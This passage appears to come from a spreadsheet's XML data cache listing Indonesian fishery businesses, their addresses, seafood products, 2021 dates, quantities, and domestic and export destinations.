    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="24670"/>
    <x v="597"/>
    <s v="PT. SEKAR LAUT, TBK"/>
    <s v="Jl. Jenggolo II/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Ikan, Kerupuk Udang"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="3800"/>
    <s v="Kabupaten Malang, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Surabaya"/>
    <s v="Australia, Brunei Darussalam, China, Germany, Japan, Korea, Democratic People's Republic of, Malaysia, Netherlands, Saudi Arabia, Singapore, Taiwan, Province of China, United Arab Emirates, United Kingdom, United States"/>
  </r>
  <r>
    <n v="24671"/>
    <x v="597"/>
    <s v="PT. SEKAR LAUT, TBK"/>
    <s v="Jl. Jenggolo II/17 , Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Ikan Goreng, Kerupuk Udang Goreng"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="3000"/>
    <s v="Kabupaten Semarang, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Malang, Kota Surabaya"/>
    <s v="Canada, China, Hong Kong, Japan, Malaysia, Netherlands, Singapore, Taiwan, Province of China, United Arab Emirates, United Kingdom, United States"/>
  </r>
  <r>
    <n v="24677"/>
    <x v="689"/>
    <s v="PT. MAHARANI ARTHA PRIMA"/>
    <s v="Jl. Palsigunung RT 003 RW 002, Kel. Mekarsari, Kec. Cimangis, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Bandung"/>
    <s v="China"/>
  </r>
  <r>
    <n v="24678"/>
    <x v="689"/>
    <s v="PT. MAHARANI ARTHA PRIMA"/>
    <s v="Jl. Palsigunung RT 003 RW 002, Kel. Mekarsari, Kec. Cimangis, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Telur Ikan Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="24679"/>
    <x v="689"/>
    <s v="PT. MAHARANI ARTHA PRIMA"/>
    <s v="Jl. Palsigunung RT 003 RW 002, Kel. Mekarsari, Kec. Cimangis, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Bandeng Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="24680"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kering"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24681"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Teripang Kering"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="75000"/>
    <m/>
    <s v="Canada, China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24704"/>
    <x v="1076"/>
    <s v="CV. ANUGRAH LIN PERKASA"/>
    <s v="Jl. Kima No.20, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="1500000"/>
    <m/>
    <s v="China, Japan, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="24707"/>
    <x v="845"/>
    <s v="CV. ETERNAL STARS OCEAN"/>
    <s v="Jl. Udang Blok M Kav No.7 (Room 1), Kawasan Pelabuhan Perikanan Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24710"/>
    <x v="1068"/>
    <s v="KOPERASI MINA RIZKI ABADI"/>
    <s v="Jl, Alor Komplek PPI Oeba, Kel, Fatubesi, Kec, Kota Lama, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Demersal Beku (Kerisi, Lencam, Manyung, Kuwe, Angoli, Kerapu, Moonfish, Kakap)"/>
    <d v="2021-05-19T00:00:00"/>
    <n v="350000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24711"/>
    <x v="1077"/>
    <s v="PT. LAUTAN MAKMUR SENTOSA"/>
    <s v="Komplek Workshop PHPT Kav 5 Muara Angke, Kel. Pluit, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="2500000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24712"/>
    <x v="1077"/>
    <s v="PT. LAUTAN MAKMUR SENTOSA"/>
    <s v="Komplek Workshop PHPT Kav 5 Muara Angke, Kel. Pluit, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Marlin, Gindara, Salem, Cakalang, Tenggiri)"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24713"/>
    <x v="1077"/>
    <s v="PT. LAUTAN MAKMUR SENTOSA"/>
    <s v="Komplek Workshop PHPT Kav 5 Muara Angke, Kel. Pluit, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Sebelah, Manyung, Kerapu, Layur, Kakap, Ekor Kuning)"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24714"/>
    <x v="1077"/>
    <s v="PT. LAUTAN MAKMUR SENTOSA"/>
    <s v="Komplek Workshop PHPT Kav 5 Muara Angke, Kel. Pluit, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Beku"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24715"/>
    <x v="61"/>
    <s v="CV. JASUMA"/>
    <s v="Jl. Raya Prancis Komplek Pergudangan Kosambi Permai Blok E-9, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-05-28T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Bandung"/>
    <s v="China, Thailand"/>
  </r>
  <r>
    <n v="24717"/>
    <x v="679"/>
    <s v="PT. SEVEN SEAS MARINE PRODUCT"/>
    <s v="Jl. Rungkut Industri VII No.8, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Kering"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="40000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24718"/>
    <x v="679"/>
    <s v="PT. SEVEN SEAS MARINE PRODUCT"/>
    <s v="Jl. Rungkut Industri VII No.8, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Telur Ikan Beku"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="4000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24720"/>
    <x v="1078"/>
    <s v="UD. LYVIA NUSA BOGA"/>
    <s v="Griya Paniki Indah, Kel. Kairagi, Kec. Mapanget, Kota Manado&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Abon Ikan"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="500"/>
    <s v="Kota Manado"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="24727"/>
    <x v="1079"/>
    <s v="LAY HUAT"/>
    <s v="Kampung Jati RT 002 RW 001, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Selar, Tenggiri, Parang-parang)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="150000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24728"/>
    <x v="1079"/>
    <s v="LAY HUAT"/>
    <s v="Kampung Jati RT 002 RW 001, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Bawal Hitam, Sebelah, Kerapu, Kakap, Ekor Kuning)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="120000"/>
    <s v="Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24729"/>
    <x v="1080"/>
    <s v="PT. PATRIA PERIKANAN LESTARI INDONESIA"/>
    <s v="Jl. Pantai Kompleks Pelabuhan Perikanan Pantai Bacan, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Deho, Kembung, Layang, Cakalang)"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="330000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="24730"/>
    <x v="1080"/>
    <s v="PT. PATRIA PERIKANAN LESTARI INDONESIA"/>
    <s v="Jl. Pantai Kompleks Pelabuhan Perikanan Pantai Bacan, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Demersal Beku (Katamba, Kuwe, Kerapu, Kakatua, Kakap)"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24731"/>
    <x v="1080"/>
    <s v="PT. PATRIA PERIKANAN LESTARI INDONESIA"/>
    <s v="Jl. Pantai Kompleks Pelabuhan Perikanan Pantai Bacan, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Loin Beku"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24732"/>
    <x v="1080"/>
    <s v="PT. PATRIA PERIKANAN LESTARI INDONESIA"/>
    <s v="Jl. Pantai Kompleks Pelabuhan Perikanan Pantai Bacan, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="24460"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24733"/>
    <x v="1080"/>
    <s v="PT. PATRIA PERIKANAN LESTARI INDONESIA"/>
    <s v="Jl. Pantai Kompleks Pelabuhan Perikanan Pantai Bacan, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Demersal Segar (Katamba, Kuwe, Kerapu, Kakatua, Kakap)"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24737"/>
    <x v="471"/>
    <s v="UD. SAMUDERA JAYA"/>
    <s v="Jl. Terboyo Industri Barat Blok E No.4, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Keong Beku"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24738"/>
    <x v="471"/>
    <s v="UD. SAMUDERA JAYA"/>
    <s v="Jl. Terboyo Industri Barat Blok E No.4, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Lemuru, Kembung, Lemadang, Salem, Banjar, Tenggiri)"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara, Kabupaten Semarang, Kota Semarang"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24739"/>
    <x v="471"/>
    <s v="UD. SAMUDERA JAYA"/>
    <s v="Jl. Terboyo Industri Barat Blok E No.4, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Gulama, Kerapu, Layur, Bawal, Kakap, Baronang, Kuro, Kurisi, Ekor Kuning)"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara, Kota Semarang, Kota Surabaya"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24740"/>
    <x v="471"/>
    <s v="UD. SAMUDERA JAYA"/>
    <s v="Jl. Terboyo Industri Barat Blok E No.4, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Utara, Kota Semarang"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24741"/>
    <x v="471"/>
    <s v="UD. SAMUDERA JAYA"/>
    <s v="Jl. Terboyo Industri Barat Blok E No.4, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerang Beku"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Utara, Kota Semarang, Kota Denpasar"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24742"/>
    <x v="471"/>
    <s v="UD. SAMUDERA JAYA"/>
    <s v="Jl. Terboyo Industri Barat Blok E No.4, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Sirip Hiu Beku"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24743"/>
    <x v="471"/>
    <s v="UD. SAMUDERA JAYA"/>
    <s v="Jl. Terboyo Industri Barat Blok E No.4, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kepiting Beku"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara, Kota Semarang"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24744"/>
    <x v="471"/>
    <s v="UD. SAMUDERA JAYA"/>
    <s v="Jl. Terboyo Industri Barat Blok E No.4, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara, Kota Semarang"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24745"/>
    <x v="471"/>
    <s v="UD. SAMUDERA JAYA"/>
    <s v="Jl. Terboyo Industri Barat Blok E No.4, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Teripang Beku"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24746"/>
    <x v="471"/>
    <s v="UD. SAMUDERA JAYA"/>
    <s v="Jl. Terboyo Industri Barat Blok E No.4, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24747"/>
    <x v="471"/>
    <s v="UD. SAMUDERA JAYA"/>
    <s v="Jl. Terboyo Industri Barat Blok E No.4, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Teripang Kering"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24748"/>
    <x v="1066"/>
    <s v="PT. CAHAYA CEMERLANG"/>
    <s v="Jl. Prof. Dr. Ir. Sutami No.22, Kel. Tamalanrea, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Chips Karaginan"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="Belgium, France"/>
  </r>
  <r>
    <n v="24749"/>
    <x v="1081"/>
    <s v="PT. CENHONG FISHERINDO"/>
    <s v="Jl. Masjid Annur, Kel. Girian Bawah, Kec. Girian, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Lemuru, Deho, Malalugis, Maesang, Sarden, Selar, Layang)"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24750"/>
    <x v="1082"/>
    <s v="MARGO KAREP"/>
    <s v="Desa Rangan RT 05, Kec, Kuaro, Kabupaten Paser&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Amplang Ikan"/>
    <d v="2021-05-03T00:00:00"/>
    <n v="1440"/>
    <s v="Kabupaten Paser"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="24751"/>
    <x v="1083"/>
    <s v="PT. NUANSA GUNA UTAMA"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room C2), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24752"/>
    <x v="1083"/>
    <s v="PT. NUANSA GUNA UTAMA"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room C2), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24753"/>
    <x v="1083"/>
    <s v="PT. NUANSA GUNA UTAMA"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room C2), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Segar"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24754"/>
    <x v="1083"/>
    <s v="PT. NUANSA GUNA UTAMA"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room C2), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerang Beku"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24755"/>
    <x v="1083"/>
    <s v="PT. NUANSA GUNA UTAMA"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room C2), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24756"/>
    <x v="1083"/>
    <s v="PT. NUANSA GUNA UTAMA"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room C2), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopod Beku (Cumi-Cumi)"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24757"/>
    <x v="1083"/>
    <s v="PT. NUANSA GUNA UTAMA"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room C2), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Beku"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24758"/>
    <x v="1083"/>
    <s v="PT. NUANSA GUNA UTAMA"/>
    <s v="Kawasan Industri Millenium, Jl. Millenium 22 Blok R-5 No.3 (Room C2), Kel. Kadu Agung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Segar"/>
    <d v="2021-06-08T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24759"/>
    <x v="1084"/>
    <s v="PT. BAHARI ANDALAN PRATAMA"/>
    <s v="Jl. Raya Perancis Komplek Pergudangan Kosambi Permai Blok O No.1 (Room 1), Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Panni, Tongkol, Kawabida, Salem)"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="24760"/>
    <x v="1084"/>
    <s v="PT. BAHARI ANDALAN PRATAMA"/>
    <s v="Jl. Raya Perancis Komplek Pergudangan Kosambi Permai Blok O No.1 (Room 1), Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="24761"/>
    <x v="1084"/>
    <s v="PT. BAHARI ANDALAN PRATAMA"/>
    <s v="Jl. Raya Perancis Komplek Pergudangan Kosambi Permai Blok O No.1 (Room 1), Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="24762"/>
    <x v="1085"/>
    <s v="PT. INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Air Tawar Segar"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24763"/>
    <x v="1085"/>
    <s v="PT. INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Air Tawar Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24764"/>
    <x v="1085"/>
    <s v="PT. INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Segar"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24765"/>
    <x v="1085"/>
    <s v="PT, INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl, Muara Baru Ujung Blok G1-2, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="42150"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24766"/>
    <x v="1085"/>
    <s v="PT. INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Segar"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24767"/>
    <x v="1085"/>
    <s v="PT. INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Beku"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Portugal, Singapore, Spain, United States"/>
  </r>
  <r>
    <n v="24779"/>
    <x v="1085"/>
    <s v="PT. INDOMAGURO TUNAS UNGGUL"/>
    <s v="Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Segar"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="0"/>
    <m/>
